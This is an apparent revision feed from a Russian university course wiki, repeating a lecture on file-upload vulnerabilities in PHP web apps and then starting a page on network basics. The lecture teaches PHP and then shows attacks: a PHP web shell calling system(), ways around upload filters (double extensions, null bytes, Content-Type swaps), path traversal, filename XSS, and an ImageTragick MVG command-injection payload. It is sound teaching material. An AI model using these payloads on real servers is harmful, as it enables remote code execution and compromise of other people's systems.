* [https://www.alchemistowl.org/pocorgtfo/pocorgtfo15.pdf Полиглоты]
* [https://drive.google.com/file/d/1Rz0RP5tKIWCmFDP3-_--VYu40ejWf48v/view?usp=sharing Валидация структурных типов]

Веб-безопасность/Уязвимости FileUpload

2020-10-15T12:43:02Z

Romankholin94: /* Задания */

=Введение=

'''Загрузка файлов пользователями''' - довольно частая часть функциональности веб-приложения (аватарки, хостинг файлов, посылка вложений вместе с сообщениями и т. д.). Небезопасная реализация этого механизма может приводить к очень серьезным уязвимостям.
Загрузка файлов необходима многим сервисам, таким как файлообменники, социальные сети, онлайн-конверторы и редакторы.

Самый простой способ реализации механизма загрузки файлов - просто создавать на файловой системе сервера файл с таким же содержимым как файл, отправленный пользователем (проще говоря, "класть" присланный пользователем файл куда-то на файловую систему сервера). После загрузки файл либо доступен пользователю по прямой ссылке (т. е. определенные URL-адреса отображаются на загруженные файлы и существует URL, обращение к которому ведет к отдаче загруженного файла), либо как то еще обрабатывается веб-приложением. Само веб-приложение во многом состоит из файлов на диске, поэтому добавление файлов на сервер может быть небезопасным, так как (в общем случае) может изменить логику работы приложения.
Соответственно, могут появляться следующие уязвимости:
* Remote Code Execution
* перезапись или удаление файлов
* Local File Read, SSRF
* Denial of Service
* Information Disclosure
* XSS
=PHP=
PHP (PHP: Hypertext Preprocessor) — скриптовый язык общего назначения, интенсивно применяемый для разработки веб-приложений.
==Привет, мир!==
Простейшая программа, выводящая надпись "Привет, мир!":
<syntaxhighlight lang="PHP">
<?php print("Привет, мир!");
</syntaxhighlight>
Каждый скрипт должен начинаться с <code> <?php </code> и желательно (но не всегда обязательно) на <code> ?> </code>. Пример кода, где <code> ?> </code> обязателен:
<syntaxhighlight lang="PHP">
<html>
<head>
<title>Наша первая php страница</title>
</head>
<body>
<h1><?php print("Привет, мир"); ?></h1>
</body>
</html>
</syntaxhighlight>
==Переменные==
В синтаксисе PHP имя переменной записывается латинскими символами, но первым символом всегда должен быть знак доллара $, после чего идёт имя. Не допускается начинать имя переменной с цифры, а также использовать любые значения, кроме букв алфавита и знака подчеркивания.

Правильные переменные:
<syntaxhighlight lang="PHP">
$age
$favorite_color
$name2
</syntaxhighlight>
Неправильные переменные:
<syntaxhighlight lang="PHP">
age
$42
$my-age
</syntaxhighlight>
Переменные бывают нескольких типов:
<syntaxhighlight lang="PHP">
$favorite_color = "green"; // строка
$favorite_number = 42; // целое число
$favorite_float_number = 0.5; // число с плавающей точкой
$favorite_bool = true; // boolean
</syntaxhighlight>
Числа можно складывать, вычитать, делить, умножать опреаторы стандартные, как и во всех языках: +, -, *, /, % - плюсь, минус, умножить, делить (деление не целочисленное), остаток от деления.
==Конкатенация==
Конкатенация - "cклейка" нескольких строчек в одну.
<syntaxhighlight lang="PHP">
<?php
$united_string = "Мой любимый цвет - " . $favorite_color . ", а любимое число - " . $favorite_number;
print($united_string);
</syntaxhighlight>
В коде выше $favorite_number - число. Поэтому данная переменная приводится к типу данных "строка", после чего уже происходит конкатенация.
==Ввод данных==
Данная функциональность редко используется, но нам это нужно было для решения задач на лекии. readline - функция ввода данных:
<syntaxhighlight lang="PHP">
<?php
$line = readline();
print($line);
</syntaxhighlight>
==Массивы==
Массив — структура данных, хранящая набор значений (элементов массива), идентифицируемых по индексу.

В обычных массивах в PHP индекс значение - целое число. Нумеруются массивы с 0:
<syntaxhighlight lang="PHP">
<?php
$fav_shows = ["game of thrones", "american horror story", "walking dead"];
</syntaxhighlight>
В ассоциативных массивах в качестве индекса может использоваться не только число. Например, строка:
<syntaxhighlight lang="PHP">
<?php
$user = ['age' => 42, 'name' => 'Иннокентий', 'fav_shows' => ["game of thrones", "american horror story", "walking dead"] ];
</syntaxhighlight>
==Условный оператор==
Синтаксис: if (условие):
<syntaxhighlight lang="PHP">
if ($gender == "мужчина") {
print("Приветствую тебя, мой Господин!");
} else if ($gender == "женщина") {
print("Приветствую тебя, о Госпожа!");
} else {
print("Не хватает гендеров.");
}
</syntaxhighlight>
* оператор присваивания: =
* операторы сравнения: ==, ===, !=, !==, >, <, <=, >=
* and, or - логические и и или соответственно
==Циклы==
Синтаксис while: while (условие_остановки):
<syntaxhighlight lang="PHP">
<?php
$i = 0;
while ($i < 10) {
print($i);
$i = $i + 1;
}
</syntaxhighlight>
Синтаксис for: for (команда,_выполняемая_до_цикла; условие_осатновки; команда,_выполняемая_в_ конце_каждой_операции):
<syntaxhighlight lang="PHP">
<?php
for ($x = 0; $x < 10; ++$x) {
print($x);
}
</syntaxhighlight>
Для асоциативных массивах есть цикл foreach:
<syntaxhighlight lang="PHP">
<?php
$user = [
'Имя' => 'Евгений',
'Возраст' => '27',
'Род занятий' => 'Программист'
];
foreach ($user as $key => $value) {
print($key . ': ');
print($value . '<br>');
}
</syntaxhighlight>
==Функции==
Синтаксис: имя_функции(аргументы_функции):
<syntaxhighlight lang="PHP">
function is_even($number) {
if ($number % 2 != 0) {
return false;
} else {
return true;
}
}
if (is_even(3)) {
print("3 - четное число");
} else {
print("3 - нечетное число");
}
</syntaxhighlight>
==Подключение файлов==
Чтобы не писать всё в одном файле, используется команда require.
Содержимое файла sub.php:
<syntaxhighlight lang="PHP">
<?php
print("Привет, я содержимое из sub.php!");
</syntaxhighlight>
Содержимое файла index.php:
<syntaxhighlight lang="PHP">
<?php
require 'sub.php';
print("А я - index.php!");
</syntaxhighlight>
После подключения sub.php, содержимого этого файла доступно в index.php.
==Полезные константы==
* __DIR__ — полный путь к директории, в которой находится текущий сценарий
* __FILE__ — полный путь к текущему сценарию
* $_COOKIE — ассоциативный массив, содержащий куки
* $_SESSION — ассоциативный массив, содержащий информацию о сессии
* $_POST — ассоциативный массив, содержащий данные, полученные после POST запроса
* $_GET — ассоциативный массив, содержащий данные, полученные после GET запроса
=Примеры=
1. Пусть есть сайт с формой:
Клиент:
<syntaxhighlight lang="HTML">
<form name="feedback" method="POST" action="form.php">
<label>Ваше имя: <input type="text" name="name"></label>
<label>Ваш email: <input type="text" name="email"></label>
<label>Сообщение: <textarea name="message"></textarea></label>

<input type="submit" name="send" value="Отправить">
</form>
</syntaxhighlight>
При получении формы сервером, данные из неё можно получить следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_POST)) {
print("Имя: " . $_POST['name']);
print("<br>Email: " . $_POST['email']);
print("<br>Сообщение: " . $_POST['message']);
}
</syntaxhighlight>
2. Другой пример - отправка формы:
Клиент:
<syntaxhighlight lang="HTML">
<form name="file_upload" method="POST" action="form.php" enctype="multipart/form-data">
<label>Ваш аватар: <input type="file" name="avatar"></label>
<input type="submit" name="send" value="Отправить файл">
</form>
</syntaxhighlight>
Работать с файлом ожно следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_FILES['avatar'])) {
$file = $_FILES['avatar'];

print("Загружен файл с именем " . $file['name'] . " и размером " . $file['size'] . " байт");
}
</syntaxhighlight>
Если не переместить файл в постаянную папку - файл будет удален:
<syntaxhighlight lang="PHP">
$current_path = $_FILES['avatar']['tmp_name'];
$filename = $_FILES['avatar']['name'];
$new_path = dirname(__FILE__) . '/' . $filename;

move_uploaded_file($current_path, $new_path);
</syntaxhighlight>
=SQL=
Так же можно работать с базами данных. mysqli_connect - функция для подключения к mysql-серверу, mysqli_query - отправка sql-запроса:
<syntaxhighlight lang="PHP">
<?php
$link = mysqli_connect("localhost", "root", "");

$sql = 'INSERT INTO cities SET name = "Санкт-Петербург"';
$result = mysqli_query($link, $sql);

if ($result == false) {
print("Произошла ошибка при выполнении запроса");
}
</syntaxhighlight>

=web shell=

Простейшим примером является загрузка файла с расширением .php на сайт, работающий на PHP (в качестве проверки можно попробовать обратиться по адресу '''cite.com/index.php''' и не получить ошибки). По умолчанию PHP-сайты работают так что пользователь обращается по URL к файлу (URL сайта, начиная с первого /, отображаются на определенную директорию на сервере, она называется '''web root''') и, если этот файл имеет расширение php (или другое расширение из предопределенного списка расширений для PHP-файлов), то содержимое этого файла выполняется как код на PHP, вывод этого кода возвращается пользователю в ответе (кстати, так работает не только PHP, но и ASP.NET Web Forms, JSP, ASP). В результате, если пользователь может загрузить на сайт файл c расширением .php и обратиться к нему по URL (т. е. этот файл будет создан где-то внутри '''web root'''), то, если сервер специально не настроен чтобы файлы из директории для загрузок не выполнялись, PHP-код в нём будет выполнен. Соответственно, загрузив на уязвимый сайт файл <code>shell.php</code> с кодом
<pre>
42 * 66613;
<?php system('ls -lsa'); ?>
</pre>
и, получив ссылку на него (к примеру, /uploads/5c8e82bb8ad66/attack.php), обратится по ней, то в результате этот PHP-код выполнится и в ответе сервера будет
произведение чисел 42 и 66613, а также список всех файлов в длинном формате (функция PHP system работает так же как одноимённая функция библиотеки Си - то есть выполняет команду shell). В итоге атакующий получает выполнение произвольного кода на сервере (RCE).

=Обход методов защиты и атака=

==Валидация имени файла==

===Черный список ресширений===
Обходится с помощью использования двойных расширений (<code>shell.php.png</code>) или малоизвестный расширений (<code>.php5</code>, <code>.phtml</code>, <code>.shtml</code>, <code>.htaccess</code>). Кроме того, возможна инъекция нулевого байта (<code>shell.php%00.jpg</code>) или регистрозависимость при проверке (<code>PHp3</code>, <code>.aSp</code>).

===Белый список расширений===
Спасает от использования атакующим малоизвестных и регистрозависимых расширений, но все ещё обходится с помощью двойных расширений или инъекции нулевого байта.

===Санитайзеры===
Оставляет большую степень свободы. Например, если санитайзер удаляет вхождения подстрок типа <code>.php</code>, то использования имени файла вида <code>shell.p'''.php'''hp</code> позволяет после загрузки получить файл с именем <code>shell.php</code>.

==Валидация Content-Type==
Обходится изменением заголовка Content-Type, например, с помощью перехватывающего прокси (burp suite). Соответсвенно, в запросе
<pre>
POST / HTTP/1.1
Host: easy.fu.khashaev.ru
Content-Length: 200
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="info.php"
Content-Type: text/php
<?php phpinfo(); ?>
------WebKitFormBoundary--
</pre>
строчка <code>Content-Type: text/php</code> может быть заменена на строчку <code>Content-Type: image/png</code>.

==Прочее==
'''Server Side Includes''' - язык для динамической «сборки» веб-страниц на сервере из отдельных составных частей и выдачи клиенту полученного HTML-документа. Имеет расширения .shtml, .stm или .shtm. Например, при загрузке и вызове '''file.shtml''', содержащего код
<pre></pre>
атакующему будет выведен список файлов данной директории.

'''Static HTML'''

При возможности загрузить на сервис статический HTML, создается HTML-страница, содержащая вредоносный код (например, крадущего cookie), и ссылка на этот файл отправляется жертве.

'''Path Traversal'''

Атака, основанная на использовании специфически составленных имен файлов (например, <code>../config.ini</code>), позволяющих выйти за пределы директории хранения файлов. Может привести к переписыванию исходных фалов веб-приложения, конфигурационных или системных файлов.
Атака возможна, если не используется функция <code>basename</code> (возвращает последний компонент имени из указанного пути) или её аналог.

'''Filename XSS'''

Сервис уязвим к XSS, если допускается имя файла вида <code><script>alert(1)</script></code>.

==Полиглоты==
Полиглотами называют файлы, которые могут быть корректно распознаны как файлы разных типов.
Можно встраивать
* JavaScript в JPEG, GIF, PNG, PDF
* HTML в что-нибудь
* PHP в [https://rdot.org/forum/showthread.php?t=2780 JPEG ], [https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromgif GIF], [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ PNG]

===Структура JPEG===
Все jpeg-файлы имеют схожую структуру. Рассмотрим в качестве примера изображение

[[Файл:Mini.jpg|128px]]

В hex-редакторе оно выглядит следующим образом

[[Файл:Hex_print.png]]

В структуре jpeg-файлов содержатся служебные маркеры, состоящие из двух байт и всегда начинающиеся с FF.

* '''FF D8''' - маркер начала jpeg-файла;
* '''FF DA''' - маркер начала секции Start of Scan:
** в двух байтах хранится длинна заголовка изображения [00 0C];
** заголовок изображения [03 01 00 02 11 03 11 00 3F 00];
** непосредственно информацию о самом изображении;
* '''FF D9''' - маркер конца jpeg-файла.

=Image Magic=
'''ImageMagick''' — набор программ для чтения и редактирования файлов множества графических форматов, свободное и кроссплатформенное ПО. Может использоваться с языками Perl, C, C++, Python, Ruby, PHP, Node.js, Pascal, Java, Delphi, в скриптах командной оболочки или самостоятельно.
ImageMagick обладает широким набором возможностей (конвертация, маскирование, увеличение контрастности и т.п.) и поддерживает работу с различными типами файлов, но так же в нем находили различные уязвимости:
* RCE [CVE-2016-3714]
* SSRF [CVE-2016-3718]
* File deletion [CVE-2016-3715]
* File moving [CVE-2016-3716]
* Local File Read [CVE-2016-3717]
CVE - Common Vulnerabilities and Exposures - база данных общеизвестных уязвимостей информационной безопасности.

Был создан сайт [https://imagetragick.com/ ImageTragick], посвященный описанию некоторых уязвимостей ImageMagic.

'''Пример.'''

Допустим, что есть некоторый онлайн-сервис, позволяющих переводить файлы в разные форматы, использующий библиотеку ImageMagic.
Тогда, создав файл exploit.mvg с содержанием
<pre>
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/
image.jpg " ; | ls "-la)'
pop graphic-context
</pre>
и выполнив запрос на преобразование файла, аналогичный команде
<pre>$ convert exploit.mvg out.png</pre>
атакующий получит список всех файлов директории.

=Задания=
* https://easy.stands.cyberschool.msu.ru/
* https://type.stands.cyberschool.msu.ru/
* https://hand.stands.cyberschool.msu.ru

=Ссылки=
* [https://www.php.net/ https://www.php.net/] - сайт PHP
* [https://htmlacademy.ru/tutorial/php https://htmlacademy.ru/tutorial/php] - учебник PHP
* [http://www.php.su/php/?php http://www.php.su/php/?php] - ещё один учебник
* [https://www.alchemistowl.org/pocorgtfo/pocorgtfo15.pdf Полиглоты]
* [https://drive.google.com/file/d/1Rz0RP5tKIWCmFDP3-_--VYu40ejWf48v/view?usp=sharing Валидация структурных типов]

Практикум на ЭВМ (2020)

2020-10-12T14:16:16Z

Romankholin94: /* Веб */

Веб-безопасность/Уязвимости FileUpload

2020-10-12T14:16:02Z

Romankholin94: Новая страница: «=Введение= '''Загрузка файлов пользователями''' - довольно частая часть функциональности…»

=Введение=

'''Загрузка файлов пользователями''' - довольно частая часть функциональности веб-приложения (аватарки, хостинг файлов, посылка вложений вместе с сообщениями и т. д.). Небезопасная реализация этого механизма может приводить к очень серьезным уязвимостям.
Загрузка файлов необходима многим сервисам, таким как файлообменники, социальные сети, онлайн-конверторы и редакторы.

Самый простой способ реализации механизма загрузки файлов - просто создавать на файловой системе сервера файл с таким же содержимым как файл, отправленный пользователем (проще говоря, "класть" присланный пользователем файл куда-то на файловую систему сервера). После загрузки файл либо доступен пользователю по прямой ссылке (т. е. определенные URL-адреса отображаются на загруженные файлы и существует URL, обращение к которому ведет к отдаче загруженного файла), либо как то еще обрабатывается веб-приложением. Само веб-приложение во многом состоит из файлов на диске, поэтому добавление файлов на сервер может быть небезопасным, так как (в общем случае) может изменить логику работы приложения.
Соответственно, могут появляться следующие уязвимости:
* Remote Code Execution
* перезапись или удаление файлов
* Local File Read, SSRF
* Denial of Service
* Information Disclosure
* XSS
=PHP=
PHP (PHP: Hypertext Preprocessor) — скриптовый язык общего назначения, интенсивно применяемый для разработки веб-приложений.
==Привет, мир!==
Простейшая программа, выводящая надпись "Привет, мир!":
<syntaxhighlight lang="PHP">
<?php print("Привет, мир!");
</syntaxhighlight>
Каждый скрипт должен начинаться с <code> <?php </code> и желательно (но не всегда обязательно) на <code> ?> </code>. Пример кода, где <code> ?> </code> обязателен:
<syntaxhighlight lang="PHP">
<html>
<head>
<title>Наша первая php страница</title>
</head>
<body>
<h1><?php print("Привет, мир"); ?></h1>
</body>
</html>
</syntaxhighlight>
==Переменные==
В синтаксисе PHP имя переменной записывается латинскими символами, но первым символом всегда должен быть знак доллара $, после чего идёт имя. Не допускается начинать имя переменной с цифры, а также использовать любые значения, кроме букв алфавита и знака подчеркивания.

Правильные переменные:
<syntaxhighlight lang="PHP">
$age
$favorite_color
$name2
</syntaxhighlight>
Неправильные переменные:
<syntaxhighlight lang="PHP">
age
$42
$my-age
</syntaxhighlight>
Переменные бывают нескольких типов:
<syntaxhighlight lang="PHP">
$favorite_color = "green"; // строка
$favorite_number = 42; // целое число
$favorite_float_number = 0.5; // число с плавающей точкой
$favorite_bool = true; // boolean
</syntaxhighlight>
Числа можно складывать, вычитать, делить, умножать опреаторы стандартные, как и во всех языках: +, -, *, /, % - плюсь, минус, умножить, делить (деление не целочисленное), остаток от деления.
==Конкатенация==
Конкатенация - "cклейка" нескольких строчек в одну.
<syntaxhighlight lang="PHP">
<?php
$united_string = "Мой любимый цвет - " . $favorite_color . ", а любимое число - " . $favorite_number;
print($united_string);
</syntaxhighlight>
В коде выше $favorite_number - число. Поэтому данная переменная приводится к типу данных "строка", после чего уже происходит конкатенация.
==Ввод данных==
Данная функциональность редко используется, но нам это нужно было для решения задач на лекии. readline - функция ввода данных:
<syntaxhighlight lang="PHP">
<?php
$line = readline();
print($line);
</syntaxhighlight>
==Массивы==
Массив — структура данных, хранящая набор значений (элементов массива), идентифицируемых по индексу.

В обычных массивах в PHP индекс значение - целое число. Нумеруются массивы с 0:
<syntaxhighlight lang="PHP">
<?php
$fav_shows = ["game of thrones", "american horror story", "walking dead"];
</syntaxhighlight>
В ассоциативных массивах в качестве индекса может использоваться не только число. Например, строка:
<syntaxhighlight lang="PHP">
<?php
$user = ['age' => 42, 'name' => 'Иннокентий', 'fav_shows' => ["game of thrones", "american horror story", "walking dead"] ];
</syntaxhighlight>
==Условный оператор==
Синтаксис: if (условие):
<syntaxhighlight lang="PHP">
if ($gender == "мужчина") {
print("Приветствую тебя, мой Господин!");
} else if ($gender == "женщина") {
print("Приветствую тебя, о Госпожа!");
} else {
print("Не хватает гендеров.");
}
</syntaxhighlight>
* оператор присваивания: =
* операторы сравнения: ==, ===, !=, !==, >, <, <=, >=
* and, or - логические и и или соответственно
==Циклы==
Синтаксис while: while (условие_остановки):
<syntaxhighlight lang="PHP">
<?php
$i = 0;
while ($i < 10) {
print($i);
$i = $i + 1;
}
</syntaxhighlight>
Синтаксис for: for (команда,_выполняемая_до_цикла; условие_осатновки; команда,_выполняемая_в_ конце_каждой_операции):
<syntaxhighlight lang="PHP">
<?php
for ($x = 0; $x < 10; ++$x) {
print($x);
}
</syntaxhighlight>
Для асоциативных массивах есть цикл foreach:
<syntaxhighlight lang="PHP">
<?php
$user = [
'Имя' => 'Евгений',
'Возраст' => '27',
'Род занятий' => 'Программист'
];
foreach ($user as $key => $value) {
print($key . ': ');
print($value . '<br>');
}
</syntaxhighlight>
==Функции==
Синтаксис: имя_функции(аргументы_функции):
<syntaxhighlight lang="PHP">
function is_even($number) {
if ($number % 2 != 0) {
return false;
} else {
return true;
}
}
if (is_even(3)) {
print("3 - четное число");
} else {
print("3 - нечетное число");
}
</syntaxhighlight>
==Подключение файлов==
Чтобы не писать всё в одном файле, используется команда require.
Содержимое файла sub.php:
<syntaxhighlight lang="PHP">
<?php
print("Привет, я содержимое из sub.php!");
</syntaxhighlight>
Содержимое файла index.php:
<syntaxhighlight lang="PHP">
<?php
require 'sub.php';
print("А я - index.php!");
</syntaxhighlight>
После подключения sub.php, содержимого этого файла доступно в index.php.
==Полезные константы==
* __DIR__ — полный путь к директории, в которой находится текущий сценарий
* __FILE__ — полный путь к текущему сценарию
* $_COOKIE — ассоциативный массив, содержащий куки
* $_SESSION — ассоциативный массив, содержащий информацию о сессии
* $_POST — ассоциативный массив, содержащий данные, полученные после POST запроса
* $_GET — ассоциативный массив, содержащий данные, полученные после GET запроса
=Примеры=
1. Пусть есть сайт с формой:
Клиент:
<syntaxhighlight lang="HTML">
<form name="feedback" method="POST" action="form.php">
<label>Ваше имя: <input type="text" name="name"></label>
<label>Ваш email: <input type="text" name="email"></label>
<label>Сообщение: <textarea name="message"></textarea></label>

<input type="submit" name="send" value="Отправить">
</form>
</syntaxhighlight>
При получении формы сервером, данные из неё можно получить следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_POST)) {
print("Имя: " . $_POST['name']);
print("<br>Email: " . $_POST['email']);
print("<br>Сообщение: " . $_POST['message']);
}
</syntaxhighlight>
2. Другой пример - отправка формы:
Клиент:
<syntaxhighlight lang="HTML">
<form name="file_upload" method="POST" action="form.php" enctype="multipart/form-data">
<label>Ваш аватар: <input type="file" name="avatar"></label>
<input type="submit" name="send" value="Отправить файл">
</form>
</syntaxhighlight>
Работать с файлом ожно следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_FILES['avatar'])) {
$file = $_FILES['avatar'];

print("Загружен файл с именем " . $file['name'] . " и размером " . $file['size'] . " байт");
}
</syntaxhighlight>
Если не переместить файл в постаянную папку - файл будет удален:
<syntaxhighlight lang="PHP">
$current_path = $_FILES['avatar']['tmp_name'];
$filename = $_FILES['avatar']['name'];
$new_path = dirname(__FILE__) . '/' . $filename;

move_uploaded_file($current_path, $new_path);
</syntaxhighlight>
=SQL=
Так же можно работать с базами данных. mysqli_connect - функция для подключения к mysql-серверу, mysqli_query - отправка sql-запроса:
<syntaxhighlight lang="PHP">
<?php
$link = mysqli_connect("localhost", "root", "");

$sql = 'INSERT INTO cities SET name = "Санкт-Петербург"';
$result = mysqli_query($link, $sql);

if ($result == false) {
print("Произошла ошибка при выполнении запроса");
}
</syntaxhighlight>

=web shell=

Простейшим примером является загрузка файла с расширением .php на сайт, работающий на PHP (в качестве проверки можно попробовать обратиться по адресу '''cite.com/index.php''' и не получить ошибки). По умолчанию PHP-сайты работают так что пользователь обращается по URL к файлу (URL сайта, начиная с первого /, отображаются на определенную директорию на сервере, она называется '''web root''') и, если этот файл имеет расширение php (или другое расширение из предопределенного списка расширений для PHP-файлов), то содержимое этого файла выполняется как код на PHP, вывод этого кода возвращается пользователю в ответе (кстати, так работает не только PHP, но и ASP.NET Web Forms, JSP, ASP). В результате, если пользователь может загрузить на сайт файл c расширением .php и обратиться к нему по URL (т. е. этот файл будет создан где-то внутри '''web root'''), то, если сервер специально не настроен чтобы файлы из директории для загрузок не выполнялись, PHP-код в нём будет выполнен. Соответственно, загрузив на уязвимый сайт файл <code>shell.php</code> с кодом
<pre>
42 * 66613;
<?php system('ls -lsa'); ?>
</pre>
и, получив ссылку на него (к примеру, /uploads/5c8e82bb8ad66/attack.php), обратится по ней, то в результате этот PHP-код выполнится и в ответе сервера будет
произведение чисел 42 и 66613, а также список всех файлов в длинном формате (функция PHP system работает так же как одноимённая функция библиотеки Си - то есть выполняет команду shell). В итоге атакующий получает выполнение произвольного кода на сервере (RCE).

=Обход методов защиты и атака=

==Валидация имени файла==

===Черный список ресширений===
Обходится с помощью использования двойных расширений (<code>shell.php.png</code>) или малоизвестный расширений (<code>.php5</code>, <code>.phtml</code>, <code>.shtml</code>, <code>.htaccess</code>). Кроме того, возможна инъекция нулевого байта (<code>shell.php%00.jpg</code>) или регистрозависимость при проверке (<code>PHp3</code>, <code>.aSp</code>).

===Белый список расширений===
Спасает от использования атакующим малоизвестных и регистрозависимых расширений, но все ещё обходится с помощью двойных расширений или инъекции нулевого байта.

===Санитайзеры===
Оставляет большую степень свободы. Например, если санитайзер удаляет вхождения подстрок типа <code>.php</code>, то использования имени файла вида <code>shell.p'''.php'''hp</code> позволяет после загрузки получить файл с именем <code>shell.php</code>.

==Валидация Content-Type==
Обходится изменением заголовка Content-Type, например, с помощью перехватывающего прокси (burp suite). Соответсвенно, в запросе
<pre>
POST / HTTP/1.1
Host: easy.fu.khashaev.ru
Content-Length: 200
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="info.php"
Content-Type: text/php
<?php phpinfo(); ?>
------WebKitFormBoundary--
</pre>
строчка <code>Content-Type: text/php</code> может быть заменена на строчку <code>Content-Type: image/png</code>.

==Прочее==
'''Server Side Includes''' - язык для динамической «сборки» веб-страниц на сервере из отдельных составных частей и выдачи клиенту полученного HTML-документа. Имеет расширения .shtml, .stm или .shtm. Например, при загрузке и вызове '''file.shtml''', содержащего код
<pre></pre>
атакующему будет выведен список файлов данной директории.

'''Static HTML'''

При возможности загрузить на сервис статический HTML, создается HTML-страница, содержащая вредоносный код (например, крадущего cookie), и ссылка на этот файл отправляется жертве.

'''Path Traversal'''

Атака, основанная на использовании специфически составленных имен файлов (например, <code>../config.ini</code>), позволяющих выйти за пределы директории хранения файлов. Может привести к переписыванию исходных фалов веб-приложения, конфигурационных или системных файлов.
Атака возможна, если не используется функция <code>basename</code> (возвращает последний компонент имени из указанного пути) или её аналог.

'''Filename XSS'''

Сервис уязвим к XSS, если допускается имя файла вида <code><script>alert(1)</script></code>.

==Полиглоты==
Полиглотами называют файлы, которые могут быть корректно распознаны как файлы разных типов.
Можно встраивать
* JavaScript в JPEG, GIF, PNG, PDF
* HTML в что-нибудь
* PHP в [https://rdot.org/forum/showthread.php?t=2780 JPEG ], [https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromgif GIF], [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ PNG]

===Структура JPEG===
Все jpeg-файлы имеют схожую структуру. Рассмотрим в качестве примера изображение

[[Файл:Mini.jpg|128px]]

В hex-редакторе оно выглядит следующим образом

[[Файл:Hex_print.png]]

В структуре jpeg-файлов содержатся служебные маркеры, состоящие из двух байт и всегда начинающиеся с FF.

* '''FF D8''' - маркер начала jpeg-файла;
* '''FF DA''' - маркер начала секции Start of Scan:
** в двух байтах хранится длинна заголовка изображения [00 0C];
** заголовок изображения [03 01 00 02 11 03 11 00 3F 00];
** непосредственно информацию о самом изображении;
* '''FF D9''' - маркер конца jpeg-файла.

=Image Magic=
'''ImageMagick''' — набор программ для чтения и редактирования файлов множества графических форматов, свободное и кроссплатформенное ПО. Может использоваться с языками Perl, C, C++, Python, Ruby, PHP, Node.js, Pascal, Java, Delphi, в скриптах командной оболочки или самостоятельно.
ImageMagick обладает широким набором возможностей (конвертация, маскирование, увеличение контрастности и т.п.) и поддерживает работу с различными типами файлов, но так же в нем находили различные уязвимости:
* RCE [CVE-2016-3714]
* SSRF [CVE-2016-3718]
* File deletion [CVE-2016-3715]
* File moving [CVE-2016-3716]
* Local File Read [CVE-2016-3717]
CVE - Common Vulnerabilities and Exposures - база данных общеизвестных уязвимостей информационной безопасности.

Был создан сайт [https://imagetragick.com/ ImageTragick], посвященный описанию некоторых уязвимостей ImageMagic.

'''Пример.'''

Допустим, что есть некоторый онлайн-сервис, позволяющих переводить файлы в разные форматы, использующий библиотеку ImageMagic.
Тогда, создав файл exploit.mvg с содержанием
<pre>
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/
image.jpg " ; | ls "-la)'
pop graphic-context
</pre>
и выполнив запрос на преобразование файла, аналогичный команде
<pre>$ convert exploit.mvg out.png</pre>
атакующий получит список всех файлов директории.

=Задания=
* http://easy.stands.secsem.msu.ru/
* http://type.stands.secsem.msu.ru/
* http://hand.stands.secsem.msu.ru/

=Ссылки=
* [https://www.php.net/ https://www.php.net/] - сайт PHP
* [https://htmlacademy.ru/tutorial/php https://htmlacademy.ru/tutorial/php] - учебник PHP
* [http://www.php.su/php/?php http://www.php.su/php/?php] - ещё один учебник
* [https://www.alchemistowl.org/pocorgtfo/pocorgtfo15.pdf Полиглоты]
* [https://drive.google.com/file/d/1Rz0RP5tKIWCmFDP3-_--VYu40ejWf48v/view?usp=sharing Валидация структурных типов]

Файл:Hex print.png

2020-10-12T11:29:40Z

Romankholin94:

Файл:Mini.jpg

2020-10-12T11:29:27Z

Romankholin94:

Практикум на ЭВМ (2020)

2020-09-29T20:49:23Z

Romankholin94:

Практикум на ЭВМ (2020)

2020-09-29T20:47:36Z

Romankholin94: /* Материалы */

Веб-безопасность/Введение в веб-технологии

2020-09-29T20:47:17Z

Romankholin94: Новая страница: «ПО, которое необходимо (обязательно!) скачать/установить к семинару (всё работает под Window…»

ПО, которое необходимо (обязательно!) скачать/установить к семинару (всё работает под Windows/Linux/Mac Os):
# Ubuntu Linux 16.04 (виртуальная машина)
# Burp Suite Pro Community Edition: [https://portswigger.net/burp/communitydownload https://portswigger.net/burp/communitydownload]

==Сеть==
===Сетевая модель OSI===
[[Файл:OSI.png|1024px]]
Сетевая модель OSI — сетевая модель стека (магазина) сетевых протоколов OSI. Посредством данной модели различные сетевые устройства могут взаимодействовать друг с другом. Модель определяет различные уровни взаимодействия систем. Каждый уровень выполняет определённые функции при таком взаимодействии.

Есть несколько уровней этой модели:
# Физический уровень
# Канальный уровень
# Сетевой уровень
# Транспортный уровень
# Сеансовый уровень
# Уровень представления
# Прикладной уровень

====Физический уровень====
Физический уровень — нижний уровень модели, который определяет метод передачи данных, представленных в двоичном виде, от одного устройства (компьютера) к другому. Физический уровень определяет такие виды сред передачи данных как оптоволокно, витая пара, коаксиальный кабель, спутниковый канал передач данных и т. п. Протоколы физического уровня: IEEE 802.15 (Bluetooth), 802.11 Wi-Fi и т. п.
====Канальный уровень====
Канальный уровень предназначен для обеспечения взаимодействия сетей на физическом уровне и контроля ошибок, которые могут возникнуть. Полученные с физического уровня данные, представленные в битах, он упаковывает в кадры, проверяет их на целостность и, если нужно, исправляет ошибки (формирует повторный запрос повреждённого кадра) и отправляет на сетевой уровень. На этом уровне работают коммутаторы, мосты и другие устройства. Пример протокола, работающего на этом уровне - IEEE 802.3 (Ethernet).
====Сетевой уровень====
Сетевой уровень модели предназначен для определения пути передачи данных. Отвечает за трансляцию логических адресов и имён в физические, определение кратчайших маршрутов, коммутацию и маршрутизацию, отслеживание неполадок и «заторов» в сети. Работающие на этом уровне устройства (маршрутизаторы) условно называют устройствами третьего уровня (по номеру уровня в модели OSI). Наиболее важные протоколы данного уровня - IP/IPv4/IPv6, о них мы подробнее поговорим ниже.
====Транспортный уровень====
